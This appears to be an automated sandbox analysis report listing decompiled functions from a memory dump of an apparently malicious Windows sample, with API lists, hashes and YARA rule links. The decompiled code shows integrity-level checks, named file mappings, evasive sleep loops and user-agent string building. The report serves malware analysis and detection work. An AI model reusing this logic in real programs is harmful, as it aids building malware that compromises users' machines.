				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L02C9B072();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x2c9d2a4; // 0x24aa5a8
				_t5 = _t13 + 0x2c9e862; // 0x5148e0a
				_t6 = _t13 + 0x2c9e59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L02C9AD0A();
				_t17 = CreateFileMappingW(0xffffffff, 0x2c9d2a8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x02c981e7
0x02c981ef
0x02c981f3
0x02c981f9
0x02c981fe
0x02c98203
0x02c98206
0x02c98209
0x02c9820e
0x02c9820f
0x02c98212
0x02c98217
0x02c9821e
0x02c98228
0x02c9822a
0x02c9822b
0x02c9822e
0x02c9824a
0x02c98250
0x02c98254
0x02c982a2
0x02c98256
0x02c98263
0x02c98273
0x02c9827b
0x02c9828d
0x02c98291
0x00000000
0x00000000
0x02c9827d
0x02c98280
0x02c98285
0x02c98287
0x02c98287
0x02c98265
0x02c98267
0x02c98293
0x02c98294
0x02c98294
0x02c98263
0x02c982a9

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,02C95C91,?,?,4D283A53,?,?), ref: 02C981F3
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 02C98209
_snwprintf.NTDLL ref: 02C9822E
CreateFileMappingW.KERNELBASE(000000FF,02C9D2A8,00000004,00000000,00001000,?), ref: 02C9824A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02C95C91,?,?,4D283A53), ref: 02C9825C
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 02C98273
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,02C95C91,?,?), ref: 02C98294
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02C95C91,?,?,4D283A53), ref: 02C9829C

Strings

@MxtNxt, xrefs: 02C9829C

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID: @MxtNxt
API String ID: 1814172918-1701360479
Opcode ID: 7c38d7a7ddd12a4f67d27248ebd31600bfe0266344baf0925f29862b1753b35c
Instruction ID: 79474f21bf22495c3cf7344a715ea17106c76b9e736c5341d86b459107efcf52
Opcode Fuzzy Hash: 7c38d7a7ddd12a4f67d27248ebd31600bfe0266344baf0925f29862b1753b35c
Instruction Fuzzy Hash: F721A572A40A04BFDB11EBA4DC0DF9D77A9AF89714F250262F606E71C0D770DA15CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02C954DA, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02C954DA(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x2c9d25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E02C97E20(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E02C9A5FA(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x02c954e7
0x02c954ee
0x02c954f5
0x02c95509
0x02c95514
0x02c9552c
0x02c95539
0x02c9553c
0x02c95541
0x02c9554c
0x02c95550
0x02c9555f
0x02c95563
0x02c9557f
0x02c9557f
0x02c95583
0x02c95583
0x02c95588
0x02c9558c
0x02c95592
0x02c95593
0x02c9559a
0x02c955a0

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 02C9550C
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 02C9552C
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 02C9553C
CloseHandle.KERNEL32(00000000), ref: 02C9558C

Part of subcall function 02C97E20: RtlAllocateHeap.NTDLL(00000000,00000000,02C98112), ref: 02C97E2C

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 02C9555F
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 02C95567
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 02C95577

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: b58a5481cd481c8bb0bd9eb80e6aa36a781b7ee4463f25f719d6112c401c3207
Instruction ID: 1c9020655f40b3d852e2a039a7aac66503977e5c9def2942593bf14892d9588c
Opcode Fuzzy Hash: b58a5481cd481c8bb0bd9eb80e6aa36a781b7ee4463f25f719d6112c401c3207
Instruction Fuzzy Hash: 12213C75D00248FFEF01AF94DC48EAEBB7AEB48344F4005A5E611A6151C7758F55EF60

Uniqueness

Uniqueness Score: -1.00%

Function 02C9523A, Relevance: 9.1, APIs: 6, Instructions: 60
sleepmemorytimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E02C9523A(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t26;
				signed int _t33;

				_t26 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0x2c9d238 = _t10;
				if(_t10 != 0) {
					 *0x2c9d1a8 = GetTickCount();
					_t12 = E02C914CE(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
							_push(0);
							_push(9);
							_push(_t23 >> 7);
							_push(_t16);
							L02C9B1D6();
							_t33 = _t14 + _t16;
							_t18 = E02C980C5(_a4, _t33);
							_t19 = 2;
							_t25 = _t33;
							Sleep(_t19 << _t33); // executed
						} while (_t18 == 1);
						if(E02C952E5(_t25) != 0) {
							 *0x2c9d260 = 1; // executed
						}
						_t12 = E02C95C02(_t26); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}

0x02c9523a
0x02c95240
0x02c95241
0x02c9524d
0x02c95253
0x02c9525a
0x02c9526a
0x02c9526f
0x02c95276
0x02c95278
0x02c9527d
0x02c95283
0x02c95289
0x02c95293
0x02c95297
0x02c95299
0x02c9529e
0x02c9529f
0x02c952a0
0x02c952a5
0x02c952ab
0x02c952b4
0x02c952b5
0x02c952ba
0x02c952c0
0x02c952cc
0x02c952ce
0x02c952ce
0x02c952d8
0x02c952d8
0x02c9525c
0x02c9525e
0x02c9525e
0x02c952e2

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,02C9647E,?), ref: 02C9524D
GetTickCount.KERNEL32 ref: 02C95261
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,02C9647E,?), ref: 02C9527D
SwitchToThread.KERNEL32(?,00000001,?,?,?,02C9647E,?), ref: 02C95283
_aullrem.NTDLL(?,?,00000009,00000000), ref: 02C952A0
Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,02C9647E,?), ref: 02C952BA

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
String ID:
API String ID: 507476733-0
Opcode ID: 71333051d654df60f12314bf49e06a067e869c757315ef4499b13c8bc23057a9
Instruction ID: 2c54c019318aa01f8145b0ab7a6630e6963dc95755814f697f7fbe93a8e179e8
Opcode Fuzzy Hash: 71333051d654df60f12314bf49e06a067e869c757315ef4499b13c8bc23057a9
Instruction Fuzzy Hash: D011A572E847006FEB10AB74DC4DB5A7A99AB89790F504B26F945D6180EB70D9108BA1

Uniqueness

Uniqueness Score: -1.00%

Function 02C95C02, Relevance: 7.7, APIs: 5, Instructions: 159
memoryCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E02C95C02(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t46;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E02C93EDF();
				if(_t21 != 0) {
					_t59 =  *0x2c9d25c; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x2c9d25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x2c9d164(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E02C987A2( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x2c9d2a4; // 0x24aa5a8
					if( *0x2c9d25c > 5) {
						_t8 = _t26 + 0x2c9e5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x2c9ea15; // 0x44283a44
						_t27 = _t7;
					}
					E02C9A69B(_t27, _t27);
					_t31 = E02C981E7(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0x2c9d270 =  *0x2c9d270 ^ 0x81bbe65d;
						_t32 = E02C97E20(0x60);
						 *0x2c9d32c = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x2c9d32c; // 0x51495b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x2c9d32c; // 0x51495b0
							 *_t51 = 0x2c9e836;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x2c9d238, 0, 0x43);
							 *0x2c9d2c4 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x2c9d25c; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x2c9d2a4; // 0x24aa5a8
								_t13 = _t58 + 0x2c9e55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x2c9c2a7);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E02C92D6E( ~_v8 &  *0x2c9d270, 0x2c9d00c); // executed
								_t42 = E02C9696A(_t55); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E02C9418D(_t55); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E02C98494(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t46 = E02C9620F(__eflags,  &(_t65[4])); // executed
									_t54 = _t46;
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x2c9d160();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E02C94359(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}

0x02c95c02
0x02c95c0d
0x02c95c10
0x02c95c13
0x02c95c16
0x02c95c1d
0x02c95c1f
0x02c95c2b
0x02c95c2d
0x02c95c2d
0x02c95c36
0x02c95c3c
0x02c95c41
0x02c95c5b
0x02c95c67
0x02c95c69
0x02c95c6e
0x02c95c78
0x02c95c78
0x02c95c70
0x02c95c70
0x02c95c70
0x02c95c70
0x02c95c7f
0x02c95c8c
0x02c95c93
0x02c95c98
0x02c95c98
0x02c95ca0
0x02c95ca3
0x02c95cc9
0x02c95cd5
0x02c95cda
0x02c95cdf
0x02c95ce1
0x02c95d0d
0x02c95d0f
0x02c95ce3
0x02c95ce7
0x02c95cec
0x02c95cf1
0x02c95cf8
0x02c95cfe
0x02c95d03
0x02c95d09
0x02c95d10
0x02c95d12
0x02c95d14
0x02c95d23
0x02c95d29
0x02c95d2e
0x02c95d30
0x02c95d60
0x02c95d62
0x02c95d32
0x02c95d32
0x02c95d38
0x02c95d45
0x02c95d4b
0x02c95d4b
0x02c95d53
0x02c95d5c
0x02c95d63
0x02c95d65
0x02c95d67
0x02c95d6e
0x02c95d7b
0x02c95d80
0x02c95d85
0x02c95d87
0x02c95d89
0x00000000
0x00000000
0x02c95d8b
0x02c95d90
0x02c95d92
0x02c95d99
0x02c95d9d
0x02c95da0
0x02c95db5
0x02c95db9
0x02c95dbe
0x00000000
0x02c95dbe
0x02c95da2
0x02c95da4
0x00000000
0x00000000
0x02c95daa
0x02c95daf
0x02c95db1
0x02c95db3
0x00000000
0x00000000
0x00000000
0x02c95db3
0x02c95d96
0x02c95d96
0x02c95d67
0x02c95ca5
0x02c95ca5
0x02c95caa
0x02c95dc0
0x02c95dc4
0x02c95dcc
0x02c95dcc
0x00000000
0x02c95dc4
0x02c95cb0
0x02c95cb3
0x02c95cbd
0x02c95cc4
0x00000000
0x02c95dd4
0x02c95dd4
0x02c95dd8
0x02c95ddc
0x02c95ddc

APIs

Part of subcall function 02C93EDF: GetModuleHandleA.KERNEL32(4C44544E,00000000,02C95C1B,00000000,00000000), ref: 02C93EEE

CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 02C95C98

Part of subcall function 02C97E20: RtlAllocateHeap.NTDLL(00000000,00000000,02C98112), ref: 02C97E2C

memset.NTDLL ref: 02C95CE7
RtlInitializeCriticalSection.NTDLL(05149570), ref: 02C95CF8

Part of subcall function 02C9620F: memset.NTDLL ref: 02C96224
Part of subcall function 02C9620F: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 02C96258
Part of subcall function 02C9620F: StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 02C96263

RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 02C95D23
wsprintfA.USER32 ref: 02C95D53

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
String ID:
API String ID: 4246211962-0
Opcode ID: 93bdacfca1f0c7e47b66548b63a63d2bcac81d4b696b6fd5aab53ab2cb41d203
Instruction ID: 3cc31473f521504544f5af4cf41b2fa53e1b099c34ba1cb8100bdc8a0ad6621a
Opcode Fuzzy Hash: 93bdacfca1f0c7e47b66548b63a63d2bcac81d4b696b6fd5aab53ab2cb41d203
Instruction Fuzzy Hash: 3A51D672E40714ABDF22EBB8DE4CB5E77B8AB48B44F940916E506E7180E770DA14CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02C9579B, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02C9579B(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t37;
				intOrPtr _t38;
				void* _t40;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E02C9A762(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x2c9d2a4; // 0x24aa5a8
				_t4 = _t24 + 0x2c9ede0; // 0x5149388
				_t5 = _t24 + 0x2c9ed88; // 0x4f0053
				_t26 = E02C94B9D( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x2c9d2a4; // 0x24aa5a8
						_t11 = _t32 + 0x2c9edd4; // 0x514937c
						_t48 = _t11;
						_t12 = _t32 + 0x2c9ed88; // 0x4f0053
						_t52 = E02C98FE0(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x2c9d2a4; // 0x24aa5a8
							_t13 = _t35 + 0x2c9ee1e; // 0x30314549
							_t37 = E02C9450C(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
							if(_t37 == 0) {
								_t61 =  *0x2c9d25c - 6;
								if( *0x2c9d25c <= 6) {
									_t42 =  *0x2c9d2a4; // 0x24aa5a8
									_t15 = _t42 + 0x2c9ec2a; // 0x52384549
									E02C9450C(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x2c9d2a4; // 0x24aa5a8
							_t17 = _t38 + 0x2c9ee18; // 0x51493c0
							_t18 = _t38 + 0x2c9edf0; // 0x680043
							_t40 = E02C927A2(_v8, 0x80000001, _t52, _t18, _t17); // executed
							_t45 = _t40;
							HeapFree( *0x2c9d238, 0, _t52);
						}
					}
					HeapFree( *0x2c9d238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E02C98371(_t54);
				}
				return _t45;
			}

0x02c9579b
0x02c957ab
0x02c957ae
0x02c957b5
0x02c957b7
0x02c957b7
0x02c957ba
0x02c957bf
0x02c957c6
0x02c957d3
0x02c957d8
0x02c957dc
0x02c957ea
0x02c957f8
0x02c957fc
0x02c9588d
0x02c9588d
0x02c95802
0x02c95802
0x02c95807
0x02c95807
0x02c9580e
0x02c9581a
0x02c9581c
0x02c9581e
0x02c95820
0x02c95827
0x02c95832
0x02c95839
0x02c9583b
0x02c95842
0x02c95844
0x02c9584b
0x02c95856
0x02c95856
0x02c95842
0x02c9585b
0x02c95860
0x02c95867
0x02c95877
0x02c95885
0x02c95887
0x02c95887
0x02c9581e
0x02c95899
0x02c95899
0x02c9589b
0x02c958a0
0x02c958a2
0x02c958a2
0x02c958ad

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05149388,00000000,?,747DF710,00000000,747DF730), ref: 02C957EA
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,051493C0,?,00000000,30314549,00000014,004F0053,0514937C), ref: 02C95887
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02C98522), ref: 02C95899

Strings

Uxt, xrefs: 02C957F0

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID: Uxt
API String ID: 3298025750-1536154274
Opcode ID: a1ed6c626844b5b5c90188c5c6234d7ebeb6bbe881ed9275f1a22ac8fef90fc2
Instruction ID: 19c8e340cb133d55bca18b32eed59b9b4c86e019633ece311bac6310c5a0526c
Opcode Fuzzy Hash: a1ed6c626844b5b5c90188c5c6234d7ebeb6bbe881ed9275f1a22ac8fef90fc2
Instruction Fuzzy Hash: 71316B32940108BEDF22EB94DD8CE9A7BBDEF48744F1105A6B606AB150D7709F15DB90

Uniqueness

Uniqueness Score: -1.00%

Function 02C98A1D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
memoryCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E02C98A1D(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t18;
				void* _t24;
				void* _t30;
				void* _t36;
				void* _t40;
				intOrPtr _t42;

				_t36 = __edx;
				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0x2c9d340; // 0x5149928
				_push(0x800);
				_push(0);
				_push( *0x2c9d238);
				if( *0x2c9d24c >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0x2c9d24c =  *0x2c9d24c + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t40 = _v8;
						 *_a16 = _a4;
						 *_a20 = E02C946F9(_t44, _t40);
						_t18 = E02C94245(_t40, _t44);
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0x2c9d24c < 5) {
								 *0x2c9d24c =  *0x2c9d24c & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E02C945F1();
						HeapFree( *0x2c9d238, 0, _t40);
						goto L10;
					}
					_t24 = E02C92941(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t24 = E02C924B4(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25); // executed
				goto L5;
			}

0x02c98a1d
0x02c98a1d
0x02c98a20
0x02c98a21
0x02c98a2b
0x02c98a32
0x02c98a37
0x02c98a39
0x02c98a3f
0x02c98a67
0x02c98a7f
0x02c98a81
0x02c98a82
0x02c98a84
0x02c98ac2
0x02c98ac2
0x02c98ac8
0x02c98ace
0x02c98ace
0x02c98a86
0x02c98a8c
0x02c98a8f
0x02c98a9e
0x02c98aa0
0x02c98aa7
0x02c98adb
0x02c98ae0
0x02c98ae2
0x02c98ae4
0x02c98ae4
0x00000000
0x02c98ae2
0x02c98aa9
0x02c98aae
0x02c98abc
0x00000000
0x02c98abc
0x02c98a76
0x02c98a7b
0x02c98a7b
0x00000000
0x02c98a7b
0x02c98a49
0x00000000
0x00000000
0x02c98a58
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,747DF710), ref: 02C98A41

Part of subcall function 02C924B4: GetTickCount.KERNEL32 ref: 02C924C8
Part of subcall function 02C924B4: wsprintfA.USER32 ref: 02C92518
Part of subcall function 02C924B4: wsprintfA.USER32 ref: 02C92535
Part of subcall function 02C924B4: wsprintfA.USER32 ref: 02C92561
Part of subcall function 02C924B4: HeapFree.KERNEL32(00000000,?), ref: 02C92573
Part of subcall function 02C924B4: wsprintfA.USER32 ref: 02C92594
Part of subcall function 02C924B4: HeapFree.KERNEL32(00000000,?), ref: 02C925A4
Part of subcall function 02C924B4: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02C925D2
Part of subcall function 02C924B4: GetTickCount.KERNEL32 ref: 02C925E3

RtlAllocateHeap.NTDLL(00000000,00000800,747DF710), ref: 02C98A5F
HeapFree.KERNEL32(00000000,00000002,02C9856D,?,02C9856D,00000002,?,?,02C95DBE,?), ref: 02C98ABC

Strings

Uxt, xrefs: 02C98ABC

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$wsprintf$AllocateFree$CountTick
String ID: Uxt
API String ID: 1676223858-1536154274
Opcode ID: dec61cebeee029bc155ff0dd7a8a72cd48b88e00aad2d2e872a2b3eb5d2b46b9
Instruction ID: 88813ea0121826827e2f7b72877af9e458c0a74a067ae4fdd3804680a7343ce4
Opcode Fuzzy Hash: dec61cebeee029bc155ff0dd7a8a72cd48b88e00aad2d2e872a2b3eb5d2b46b9
Instruction Fuzzy Hash: 14214CB2680204EBCF11EF59D848BAA77ACFB4A745F004626F902E7240DB70DE55DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02C9907D, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 02C990DA
SysAllocString.OLEAUT32(02C94010), ref: 02C9911E
SysFreeString.OLEAUT32(00000000), ref: 02C99132
SysFreeString.OLEAUT32(00000000), ref: 02C99140

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 828fe4b23d3d46597eaf3fc518fbcd8c0df9abb62ae9306dc2cb8e5b36467921
Instruction ID: 25da10954e4a11818303126f1c6536fe3d9f4b756177ea8dc19ef157e05438f5
Opcode Fuzzy Hash: 828fe4b23d3d46597eaf3fc518fbcd8c0df9abb62ae9306dc2cb8e5b36467921
Instruction Fuzzy Hash: 26310B71900209EFCF05DF99D8C89AE7BB9FF58344B11856EF506A7250D7319A81CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02C96BC0, Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E02C96BC0(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E02C97E20(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x2c9c2a4); // executed
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x2c9c2a4);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
